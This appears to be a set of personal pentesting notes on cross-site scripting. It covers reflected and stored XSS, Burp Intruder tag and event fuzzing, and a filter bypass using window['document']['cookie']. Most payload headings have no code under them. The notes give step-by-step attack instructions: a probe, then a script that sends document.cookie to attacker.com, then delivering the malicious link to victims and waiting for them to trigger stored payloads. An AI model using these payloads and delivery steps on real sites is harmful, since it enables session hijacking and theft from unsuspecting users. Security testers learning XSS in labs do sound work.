XSS
Reflected:
Identify user input fields:
Find locations where the server reflects user input in the HTTP response. This could be search fields, form submissions, or URL query parameters.
Probe with XSS payloads:
Inject simple XSS payloads like:
https://example.com/search?q=<script>alert(1)</script>
<img src="x" onerror="alert(1)">
If the input is reflected unsanitized in the HTML response, the payload will be executed in the victim's browser.
Craft a targeted payload:
Once you've verified reflection, modify the script to achieve something malicious, such as stealing cookies with:
<script>document.location='https://attacker.com?cookie='+document.cookie</script>
Deliver payload:
Share the malicious link via email, chat, or any other method. When a victim clicks the link, the XSS payload is executed.
Stored:
Identify input fields that store data:
Look for areas where user data is stored and reflected back later, such as comment sections, user profiles, or message boards.
Test with XSS payload:
Submit an XSS payload like:
<script>alert('XSS')</script>
in a comment or profile field.
If the payload is stored and reflected unsanitized in the webpage, the script will execute when another user views it.
Create a malicious payload:
Use JavaScript to steal session tokens, redirect users, or perform other harmful actions.
Wait for victim interaction:
Once stored, any user who accesses the page will trigger the stored XSS attack.
Common attack vectors:
URL parameters (for reflected XSS).
Comment sections, user profile pages, or message boards (for stored XSS).
Payloads:
Basic payloads
Testing allowed tags:
Intruder tag <§§>, with the tag list copied to clipboard from: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Intruder <allowed-tag%20§§=1>, with the event list copied to clipboard from: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Custom tags allowed
Note: the custom tag with the ID x contains an onfocus event handler that triggers document.location. The hash (#) character at the end of the URL focuses this element as soon as the page is loaded, causing the payload to be called. Host the payload script on the exploit server in script tags, and send it to the victim.
SVG payload with animatetransform
Protocol assing inside payload
Autorun with onfocus
Onhashchange
Onresize
Script tag cookie stealer
Input value inside JS backticks
Escaping quote input
XSS WAF bypass
https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/
The web application has a filter that blocks the string "document.cookie" in any user input. In this case, a JavaScript global variable can be used to bypass it. There are many ways to reach document.cookie from the window or self object; for example, window["document"]["cookie"] will not be blocked.
The more complex techniques